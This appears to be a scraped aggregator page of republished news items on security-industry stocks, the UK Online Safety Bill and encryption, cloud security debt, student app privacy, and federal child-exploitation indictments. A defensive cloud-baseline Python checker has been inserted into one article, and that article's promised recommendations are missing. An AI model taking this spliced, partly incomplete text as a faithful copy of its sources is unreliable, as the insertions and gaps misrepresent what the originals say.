Each of the companies mentioned below presently carries a Zacks Rank #2 (Buy). You can see the complete list of today's Zacks #1 Rank (Strong Buy) stocks here.

Johnson Controls: A diversified technology company and a multi-industrial leader, Johnson Controls is involved in the creation of intelligent buildings, providing efficient energy solutions and integrated infrastructure. A robust demand environment, pricing actions and cost-control initiatives are expected to drive JCI's growth. Continued improvement in HVAC & Controls and strength in Fire & Security are key catalysts to the company's growth.

The Zacks Consensus Estimate for Johnson Controls' fiscal 2023 (ending September 2023) earnings has been revised upward by 2.6% in the past 90 days. Shares of the company have gained 8.6% in the year-to-date period.

Brady: The company offers complete identification solutions that help companies improve productivity, performance, safety and security. Brady is gaining from its continued focus on product development and innovation. Inorganic activities position BRC well for future growth. The Zacks Consensus Estimate for Brady's fiscal 2023 (ending July 2023) and fiscal 2024 earnings has been revised upward by 1.4% each in the past 90 days. Shares of the company have gained around 7% in the year-to-date period.

Lakeland Industries: The company manufactures industrial protective clothing and accessories for the industrial and public protective clothing market. LAKE is benefiting from significant contributions from the acquisition of Eagle Technical Products, which has expanded the company's fire service protective clothing division. Improved product mix and cost-control measures should fuel the company's growth. Reduction in raw material costs and manufacturing expenses should bolster LAKE's bottom line.

The Zacks Consensus Estimate for Lakeland Industries' fiscal 2024 (ending January 2024) earnings has been revised upward by 9.4% in the past 90 days. Shares of the company have appreciated 15.1% in the year-to-date period.


Zacks Investment Research

Read the original post:
3 Top Stocks From the Flourishing Security and Safety Services Industry - Yahoo Finance

Apple warning it could shut FaceTime, iMessage in UK over govt surveillance policy adds to growing tech industry discontent – TechCrunch

We haven't been able to confirm the substance of the BBC's reporting with Apple, which did not respond when we contacted it with questions about the story. However, the tech giant recently elected to brief the broadcaster on its displeasure at another piece of (incoming) UK digital regulation, hitting out in a statement last month at the Online Safety Bill (OSB) as a risk to encryption.

In making critical remarks public Apple joined a number of major tech services that had already been warning over powers contained in the draft legislation they say could enable the Internet regulator to order platforms to remove strong encryption.

Of particular concern is a government amendment last year that put the bill on a direct collision course with E2EE by proposing the regulator, Ofcom, should have powers to force platforms to scan messages for child sexual abuse material (CSAM) which, in the case of E2EE services, would likely require they implement client-side scanning by default (or otherwise backdoor encryption).

Privacy and security experts have lined up to warn over the security risks of such an approach.

As have other E2EE comms providers, including WhatsApp and Signal who have suggested they would either stop offering service in the UK or else wait to be blocked by authorities rather than comply with a law they believe will compromise the security of all their users.

The online encyclopedia Wikipedia is another high-profile critic. It, too, has suggested it could exit the UK if the government doesn't rethink its approach.

Wikipedia's concern for its service focuses on measures in the OSB related to age-gating and content censorship, ostensibly for child protection, which its founder, Jimmy Wales, has attacked as being bad for human rights, bad for Internet safety and simply bad law.

"We would definitely not age gate nor selectively censor articles under any circumstances," Wales told TechCrunch when asked to confirm Wikipedia's position on the legislation, adding: "We've chosen to be blocked in China and Turkey and other places rather than censor Wikipedia, and this is not different."

Despite the cavalcade of mainstream tech industry and expert criticism fired at the OSB ministers have so far only entrenched their position, claiming the legislation is a vital tool to fight CSAM and will also boost protections for children and other vulnerable web users.

Even concerns raised by the director of the research group selected by the government for a technical evaluation of a handful of safety tech projects given public funding back in 2021, as part of a Home Office competition to develop technology which can detect CSAM on E2EE services without compromising privacy, do not appear to have given ministers pause for thought.

"The issue is that the technology being discussed is not fit as a solution," Awais Rashid, professor of cyber security at the University of Bristol and director of the Rephrain Centre, warned in a university press release earlier this month. "Our evaluation shows that the solutions under consideration will compromise privacy at large and have no built-in safeguards to stop repurposing of such technologies for monitoring any personal communications.

"Nor are there any mechanisms for ensuring transparency and accountability of who will receive this data and for what purposes will it be utilised. Parliament must take into account the independent scientific evidence in this regard. Otherwise the Online Safety Bill risks providing carte blanche for monitoring personal communications and potential for unfettered surveillance on a societal scale."

The government's willingness to ignore OSB critics may boil down to popular support based on its framing of the legislation as a vital child safety intervention.

Opposition to the bill within parliament has also been limited, with the opposition Labour Party broadly falling in behind the government to support the bill. Peers in the second chamber have also failed to respond to last minute calls to amend the legislation to ensure encryption is safe.

Following a final debate in the Lords last night, the Open Rights Group issued a statement warning there had been no progress in ensuring the bill could not compromise encryption:

"As it stands, the Online Safety Bill will give Ofcom the power to ask tech companies to scan our private messages on the government's behalf. Despite having cross party support, the opposition withdrew an amendment that would at least ensure judges have oversight over these powers for government-mandated surveillance.

"The government claims it will protect encryption but has still not provided detail about how this is possible if these powers are enacted. It is now left to tech companies, who may have to deal with notices asking them to weaken the security of their products."

The bill still has to pass through final stages, which could include consideration of further amendments. But time is running out for the government to avoid a direct collision course with mainstream E2EE tech platforms. So far it's preferred the fudge of claiming Ofcom would simply never ask E2EE companies to break their encryption, without providing legal certainty by specifying that in the bill.

The government took a similarly fuzzy approach to encryption in the IPA (Investigatory Powers Act), which did not make it explicitly clear whether the law was essentially outlawing comms providers from using E2EE, since it contained powers under which they could be mandated to hand over decrypted data. So there is something of a pattern in UK tech policymaking over the past several years where it touches strong encryption.

As for the planned changes to further extend the IPA notice regime, it remains to be seen whether Apple's biggest threat yet to yank FaceTime and iMessage out of the UK gives government ministers cold feet or not.

Intelligence agency surveillance powers aren't likely to be quite so easy to sell to the British public as populist claims to be clamping down on Big Tech to protect kids. But it's notable that the Home Office statement in response to Apple's threat cites catching child sex abusers as one of the missions the IPA was designed for.

See original here:
Apple warning it could shut FaceTime, iMessage in UK over govt surveillance policy adds to growing tech industry discontent - TechCrunch

Reducing Security Debt in the Cloud – Dark Reading

Debt is a big topic of discussion these days: household debt in inflationary times, tax debt following the income tax filing deadline, the debate over raising the government's debt ceiling. But one kind of debt that can haunt organizations long term doesn't get as much attention: security debt.

Just like not doing what needs to be done in time can leave you behind on your taxes or your bills and piles on interest, leaving your cybersecurity by the wayside as you build your organization can cost you more in the long term. When you don't put the building blocks in place early and pay for things upfront, the overall debt will grow as time marches on.

Many organizations deploy applications without incorporating security into the development life cycle. As a result, they often must go back and reengineer the software down to its fundamental building blocks because of inherent security flaws, which costs exponentially more than if they had built in those security checks early on.

The growth in cloud services and the move of more operations to the cloud only magnifies this effect. Since cloud applications can be spun up by anyone with a credit card, developers can potentially put valuable data and business assets at risk. Before the cloud, if a business unit wanted to deploy a new application, it would have to engage the IT organization, generally ensuring some level of security oversight. Today, a business unit can outsource the development of a custom environment on any cloud platform, without IT. Additionally, when IT and the information security team find out about these assets, they often have limited visibility into the cloud infrastructure and configuration.

With companies constantly scrambling to build and deploy apps faster using cloud infrastructure-as-a-service platforms, security debt can mount faster than credit card charges in the drive to be agile. Obviously, the worst-case scenario of security debt is a breach: a ransomware attack, vandalism, theft, or some other attack. But there are many other casualties of security debt that can also be quantified. For example, the costs of reengineering security after the fact for compliance in highly regulated industries such as retail and finance can be substantial. Meanwhile, regulators are increasingly willing to lay down fines and penalties for companies that suffered data breaches because their security was noncompliant and insufficient.

Establishing baselines and aligning with some basic security frameworks can be useful tools to prevent the buildup of security debt. A security program assessment (SPA) can look holistically across multiple domains of security, including security awareness, vulnerability management, or identity and access management, and evaluate practices in each of those domains to give an overall assessment against industry-specific best practices. The Center for Internet Security (CIS), for example, provides valuable control and benchmark guidelines.
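A baseline is only useful if it can be checked repeatedly against what actually got deployed, which is exactly the visibility gap the article describes. The script below is an added example, not code from the Dark Reading article, from CIS, or from any cloud provider: it expresses a handful of benchmark-style rules as predicates and evaluates them over a constructed inventory of cloud resources, producing the list of failures that is, in effect, the security debt to pay down. The rule identifiers (BASE-1 to BASE-6), the inventory schema and every resource record are assumptions made for illustration; they are not real CIS Benchmark IDs or a real provider API schema.

```python
"""Baseline drift check over a constructed cloud inventory.

Added example for this page; not code from the Dark Reading article,
from CIS, or from any cloud provider. The rule identifiers (BASE-n),
the inventory schema and every record below are assumptions made for
illustration, not real CIS Benchmark IDs or a real API schema.
"""
from dataclasses import dataclass
from typing import Callable

# Constructed inventory: roughly what a normalised config export of one
# account might look like. Every value is made up for the example.
INVENTORY = [
    {"type": "storage_bucket", "name": "customer-exports",
     "public_access_blocked": False, "encryption_at_rest": True,
     "access_logging": False},
    {"type": "storage_bucket", "name": "build-artifacts",
     "public_access_blocked": True, "encryption_at_rest": True,
     "access_logging": True},
    {"type": "iam_user", "name": "root",
     "mfa_enabled": False, "active_access_keys": 2},
    {"type": "iam_user", "name": "ci-deployer",
     "mfa_enabled": True, "active_access_keys": 1},
    {"type": "security_group", "name": "db-tier",
     "ingress": [{"port": 5432, "cidr": "10.0.0.0/8"},
                 {"port": 22, "cidr": "0.0.0.0/0"}]},
    {"type": "security_group", "name": "web-tier",
     "ingress": [{"port": 443, "cidr": "0.0.0.0/0"}]},
]

ADMIN_PORTS = {22, 3389}          # SSH and RDP
ANYWHERE = {"0.0.0.0/0", "::/0"}  # unrestricted IPv4 / IPv6 source


@dataclass(frozen=True)
class Rule:
    rule_id: str                    # illustrative IDs, not CIS numbering
    resource_type: str              # which inventory records it applies to
    description: str
    passes: Callable[[dict], bool]  # True when the record meets the baseline


@dataclass(frozen=True)
class Finding:
    rule_id: str
    resource: str
    description: str


def no_admin_ingress_from_anywhere(sg: dict) -> bool:
    """A security group must not expose SSH/RDP to the whole internet."""
    return not any(r["port"] in ADMIN_PORTS and r["cidr"] in ANYWHERE
                   for r in sg["ingress"])


# A small baseline in the spirit of CIS benchmark checks. Each rule is a pure
# predicate over one record, so it can be unit-tested and reused unchanged
# against every account exported into the same schema.
RULES = [
    Rule("BASE-1", "storage_bucket", "public access is blocked",
         lambda b: b["public_access_blocked"]),
    Rule("BASE-2", "storage_bucket", "encryption at rest is enabled",
         lambda b: b["encryption_at_rest"]),
    Rule("BASE-3", "storage_bucket", "access logging is enabled",
         lambda b: b["access_logging"]),
    Rule("BASE-4", "iam_user", "MFA is enabled",
         lambda u: u["mfa_enabled"]),
    Rule("BASE-5", "iam_user", "root account has no access keys",
         lambda u: u["name"] != "root" or u["active_access_keys"] == 0),
    Rule("BASE-6", "security_group", "no SSH/RDP ingress from 0.0.0.0/0",
         no_admin_ingress_from_anywhere),
]


def evaluate(inventory: list[dict], rules: list[Rule]) -> list[Finding]:
    """Return one Finding per (rule, record) pair that fails the baseline."""
    findings = []
    for record in inventory:
        for rule in rules:
            if rule.resource_type == record["type"] and not rule.passes(record):
                findings.append(Finding(rule.rule_id, record["name"],
                                        rule.description))
    return findings


def debt_by_rule(findings: list[Finding]) -> dict[str, int]:
    """Count failures per rule: the shape of the backlog to pay down."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule_id] = counts.get(f.rule_id, 0) + 1
    return dict(sorted(counts.items()))


if __name__ == "__main__":
    found = evaluate(INVENTORY, RULES)
    for f in found:
        print(f"{f.rule_id} {f.resource}: {f.description}")
    print(debt_by_rule(found))
```

The point of keeping each rule a pure predicate is that the same baseline can be run on every account export, in CI and on a schedule, so drift introduced by a business unit that never engaged IT still surfaces as a finding rather than being discovered during a breach investigation.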

Aligning with one of those frameworks accomplishes a similar role for cyber defenses as a building code does in construction, getting the organization to a baseline of safety practices that can prevent a catastrophe. The building code will not get you the fanciest mansion, but it will produce a safe home; in the same way, having a cyber baseline will provide the basic minimum benchmark for safety.

Just like building codes vary geographically (hurricanes are a bigger concern in Florida than in Maine), the baselines for data security vary by industry. A retailer may be more concerned about complying with the Payment Card Industry Data Security Standard (PCI DSS), while other industries may be more concerned with meeting the baseline set by the National Institute of Standards and Technology (NIST) in its Cybersecurity Framework (CSF).

Aligning with a security framework provides some guidance on best practices, but an organization needs to fine-tune the guidelines for its unique environment and requirements. Here are some recommendations for preventing security debt in the cloud:

Security debt exists in traditional on-premises data centers as well as newer cloud platforms. Preventing it from accumulating in the cloud, however, requires a different set of skills, processes, and tools. Following the recommendations above can help pay down existing security debt before the next big breach, and avoid racking up new debt.

Read this article:
Reducing Security Debt in the Cloud - Dark Reading

Districts, Take Note: Privacy Is Rare in Apps Used in Schools – Education Week

Schools are falling short on vetting the apps and internet services they require or recommend that students use.

That's among the findings of a comprehensive analysis of school technology practices by Internet Safety Labs, a nonprofit group that researches tech product safety.

Researchers analyzed more than 1,300 apps used in 600 schools across the country, looking at what information the apps, and the browser versions of those apps, are collecting on students and who that information is shared with or sold to.

Not protecting students' personal information in the digital space can cause real-world harms, said Lisa LeVasseur, the founder and executive director of Internet Safety Labs and one of the co-authors of the report. Strangers can glean a lot of sensitive information about individuals, she said, from even just their location and calendar data.

"It's like pulling a thread," LeVasseur said. "Even data that may seem innocuous can be used maliciously, potentially, certainly in ways unanticipated and undesired. These kids are not signing up for data broker profiles. None of us are, actually."

(Data brokers are companies that collect peoples personal data from various sources, package it together into profiles, and sell it to other companies for marketing purposes.)

Only 29 percent of schools appear to be vetting all apps used by students, the analysis found. Schools that systematically vet all apps were less likely to recommend or require students use apps that feature ads.

But in an unusual twist, those schools that vet their tech were actually more likely to require students use apps with poor safety ratings from Internet Safety Labs. Although LeVasseur said she's not sure why that is the case, it might be because schools with systematic vetting procedures wound up requiring that students use more apps, giving schools a false sense of security that the apps they approved were safe to use.

Its also hard for families to find information online about the technology their children are required to use for school and difficult to opt out of using that tech, according to the report.

Less than half of schools (45 percent) provide a technology notice that clearly lists all of the technology products students must use, the researchers found. While not required under federal or most state laws, it is considered a best practice, the report said.

Only 14 percent of schools gave parents and students older than 18 years of age the opportunity to consent to technology use.

Researchers for Internet Safety Labs also found that apps with the third-party COPPA Safe Harbor certification, which indicates that an app follows federal privacy-protection laws for children, are frequently sharing student data with the likes of Facebook and Twitter. Safe Harbor certified apps also have more advertising than the overall sample of apps the report examined.

The certification verifies that the apps abstain from some important data privacy practices, like behavioral advertising, said LeVasseur. But school leaders may not be getting the data privacy protection for students that they believe they are.

"Third-party certifications may not be doing what you think they are," said LeVasseur.

But overall, apps with third-party certifications, such as 1EdTech, and pledges or promises, such as the Student Privacy Pledge or the Student Data Privacy Consortium, received better data privacy safety ratings under the rubric developed by the Internet Safety Labs.

In all, the Internet Safety Labs examined and tested 1,357 apps that schools across the country either recommend or require students and families to use. It created its sample of apps by assessing the apps recommended or required in a random sample of 13 schools from each of the 50 states and the District of Columbia, totaling 663 schools serving 456,000 students.

While researchers for Internet Safety Labs were only able to analyze the off-the-shelf versions of the apps schools used (they did not have access to school versions of these apps), the group estimates that 8 out of every 10 apps recommended by schools to students are of the off-the-shelf variety.

This is the second report from an ambitious evaluation of the technology used in schools by Internet Safety Labs. The first report, released in December, labeled the vast majority of those apps (96 percent) as not safe for children to use because they share information with third parties or contain ads.

That report also flagged that the custom-built apps some districts use to communicate with families often have more privacy issues than regular apps.

The big takeaway for school and district leaders? LeVasseur said it's to be on high alert.

While new technology can be exciting, and schools might be eager to adopt it, education leaders should be picky about what apps students are required or recommended to use. "Less is more" should be a guiding star for schools, LeVasseur said.

"I really have a lot of sympathy for schools because they need probably a lot more support than they have, given the risks of technology and the confusing nature of the laws at both the state and federal level," she said. "I think they're struggling. I don't think they know what best practices are."

Read this article:
Districts, Take Note: Privacy Is Rare in Apps Used in Schools - Education Week

Two Indictments Charge International Travel to Engage in Illicit … – Department of Justice

SACRAMENTO, Calif. U.S. Attorney Phillip A. Talbert joins with Homeland Security Investigations Special Agent in Charge Tatum King, FBI Special Agent in Charge Sean Ragan, and Kathleen Nicholls, Chief of the Department of Consumer Affairs Division of Investigation to announce indictments charging sexual exploitation of children, a global problem demanding a global response.

The indictments are part of an initiative known as Project Safe Childhood that seeks to prevent the sexual exploitation of children and achieve justice for the victims of such crimes.

"To vindicate victims of child exploitation and bring criminals to justice, our law enforcement and our communities must work together in partnership across county, state, and national borders," U.S. Attorney Talbert said. "Our office is committed to protect our children and hold offenders accountable."

"Homeland Security Investigations San Francisco/NorCal and FBI, in partnership with the California Dept of Consumer Affairs and the U.S. Attorney's Office, are seeking information on any individuals that may have been victimized by Mr. Reger," said HSI Special Agent in Charge Tatum King. "Of importance, HSI and Law Enforcement partners are focused on providing victim support and holding the alleged violator accountable for his actions in a court of law. We ask the community and media to help magnify this request so that victims, regardless of their current location around the world, can be aware of the latest developments in this case."

"Child predators prey upon the innocence and naivete of their victims, damaging trust and forever changing the course of their lives. The FBI Sacramento Field Office is determined to thoroughly investigate allegations like these to seek justice and connect identified victims with vital services that can help heal the trauma they have experienced," said Special Agent in Charge Sean Ragan of the FBI Sacramento Field Office. "We are grateful for our continued partnership with the Lassen County Sheriff's Office, Lassen County District Attorney's Office, and Homeland Security Investigations. Trust and collaboration are essential to ensuring the safety and security of the communities we serve. We also thank the Church of the Nazarene and California Department of Consumer Affairs for their efforts to aid this investigation."

"The California Department of Consumer Affairs is committed to protecting California consumers," said Kathleen Nicholls, Chief of the Department of Consumer Affairs Division of Investigation. "We are grateful for our law enforcement partners who share the common goal of taking action against those who violate the law."

Danish Man Alleged to Have Traveled from Denmark to Fresno to Exploit a Minor

A federal grand jury returned a two-count indictment today against Claus Svelmo Marcuslund, 58, of Denmark, charging him with distribution of child pornography and attempted coercion or enticement of a minor to engage in illicit sexual activity.

According to court documents, in January 2023, Marcuslund contacted an undercover agent who had created the profile of a mother with a seven-year-old daughter, on a dark web website dedicated to persons interested in pedophilia. Marcuslund told the agent that "I'm Scandinavian, professional music producer/songwriter and lyricist and yeah, I'm also a pedophile." He also stated that "I'm divorced and now searching [for] a nice woman/mom to get to know better, hopefully with the potential of getting together in real life one day. Obviously, she must be 100% supportive of pedophilia and incest." During the next several months Marcuslund sent messages to the agent through the website's messaging feature, as well as the fully encrypted Telegram application, that explained in graphic detail the sexual acts in which he hoped to engage with the mother and child. As part of those communications, he sent images of adults sexually abusing young children. He also discussed having another child with the mother and molesting the newborn.

Marcuslund boarded a flight from Copenhagen to the Los Angeles International Airport and then boarded a flight to Fresno. On July 11, 2023, Marcuslund was arrested upon arrival at the Fresno International Airport and has been ordered detained as a risk of flight and danger to the community.

This case is the product of an investigation by Homeland Security Investigations with assistance from the Central Valley Internet Crimes Against Children Task Force. Assistant U.S. Attorney David Gappa is prosecuting the case.

Susanville Man Charged with Multiple Crimes Involving Sexual Abuse of Minors

A federal grand jury returned a five-count indictment today against Bradley Earl Reger, 67, of Susanville, charging him with: engaging in illicit sexual activity abroad, transportation of a minor with intent to engage in criminal sexual activity, and coercion and enticement.

According to court documents, Reger sexually abused more than a dozen patients between the ages of 12 and 22 under the guise of conducting purported medical examinations at his medical clinic in Susanville, and in hotel rooms and camp sites all over the world. Reger is a licensed Nurse Practitioner with the California Board of Registered Nursing and has been since at least 2003. Since at least 1986, Reger has been heavily involved in various Christian schools, summer camps, youth groups, and church missions. He has held positions as a teacher, camp counselor, church deacon, youth group leader, and owner of affiliated nonprofit organizations.

The indictment alleges that Reger sexually abused three different minor victims, in locations such as: Susanville, Nevada, Virginia, and Poland. These offenses allegedly took place between 2006 and 2014.

This case is the product of an investigation by the Federal Bureau of Investigation, Homeland Security Investigations, and the California Department of Consumer Affairs with assistance from the Lassen County Sheriff's Office and the Lassen County District Attorney's Office. Assistant U.S. Attorneys Christina McCall and Roger Yang are prosecuting the case.

The FBI and HSI are seeking to identify potential victims of Bradley Reger. If you believe that you and/or your minor dependent(s) were victimized by Reger at any time, in the United States or abroad, or have information relevant to this investigation, please complete the online form available at: http://www.fbi.gov/RegerVictims. Additionally, if you know of someone else who may have been victimized by Bradley Reger, please encourage them to complete the form.

If convicted, Reger faces a maximum statutory penalty of 30 years in prison and a $250,000 fine for the counts of engaging in illicit sexual conduct abroad, up to life in prison and a fine of $250,000 for transportation with intent to engage in criminal sexual activity, and up to 20 years in prison and a fine of up to $250,000 for coercion and enticement. If convicted, Marcuslund faces a maximum statutory penalty of life in prison and a $250,000 fine.

Any sentence, however, would be determined at the discretion of the court after consideration of any applicable statutory factors and the Federal Sentencing Guidelines, which take into account a number of variables. The charges are only allegations; the defendants are presumed innocent until and unless proven guilty beyond a reasonable doubt.

These cases are brought as part of Project Safe Childhood, a nationwide initiative launched in May 2006 by the Department of Justice to combat the growing epidemic of child sexual exploitation and abuse. Led by the United States Attorneys' Offices and the Criminal Division's Child Exploitation and Obscenity Section, Project Safe Childhood marshals federal, state, and local resources to locate, apprehend, and prosecute those who sexually exploit children, and to identify and rescue victims. For more information about Project Safe Childhood, please visit http://www.usdoj.gov/psc. Click on the resources tab for information about internet-safety education.

Read more:
Two Indictments Charge International Travel to Engage in Illicit ... - Department of Justice